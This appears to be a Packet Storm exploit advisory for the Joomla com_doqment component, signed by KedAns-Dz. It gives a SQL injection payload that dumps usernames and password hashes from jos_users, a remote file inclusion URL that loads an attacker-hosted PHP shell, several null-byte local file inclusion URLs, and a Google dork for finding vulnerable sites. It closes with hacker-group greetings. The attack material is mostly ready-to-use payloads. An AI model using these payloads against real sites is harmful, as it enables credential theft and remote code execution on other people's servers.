The Joomla Doqment component suffers from local file inclusion, remote file inclusion, and remote SQL injection vulnerabilities.
9539f15e77d7695eccc87a4e88ac5e74c91e9a295838f7d5cc350f2160cd9ddd######
# Title : Joomla Component (com_doqment) Multi Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Get Password & {R/L} File Inclusion
# Tested on : Windows XP sp3 FR
######
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
######
# After seeing the bug : http://exploit-db.com/exploits/10965
# Detected By : Gamoscu
# Go0gle Dork : " inurl:com_doqment "
######
#==============>>>>> Exploit (1) SQL Injection %100 <<<<<=======================#
> DzSQL : -11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
> ExplO!t : http://[Target]/[Path]/index.php?option=com_doqment&cid= ! [ DzSQL Here ] !
#==============>>>>> Exploit (2) Remote File Inclusion %50 <<<<<=================#
> DzShell : http://[Your-Space]/Sh311.php
> ComBug : admin.ponygallery.html.php?mosConfig_absolute_path=
> ExplO!t : http://[Target]/[Path]/index.php?option=com_doqment&cid=[+ ComBug +]=[ ! DzShell ! ]
""" Note Fo4r This exploit RFI : 50% Because Not All Sites has Component 'ponygallery' in 'com_doqment' """
#==============>>>>> Exploit (3) Local File Inclusion %50 <<<<<=================#
> ExplO!t : http://[Target]/[Path]/components/com_doqment/documents?file=[LFI]%00
> http://[Target]/[Path]/components/com_doqment/documents/file?id=[LFI]%00
> http://[Target]/[Path]/components/com_doqment/documents/?=[LFI]%00
> http://[Target]/[Path]/components/com_doqment/files/?=[LFI]%00
> http://[Target]/[Path]/components/com_doqment/file/?=[LFI]%00
""" Note Fo4r This exploit LFI : 50% Because Not All Sites has Link Files """
"" ++ Or Must Assessing Function (..?File;?Doc..etc!!) Place """
__End Exploits_
# Thanks Gamoscu #
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
# Greets All My Friends (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers .
# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker .
#===============================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed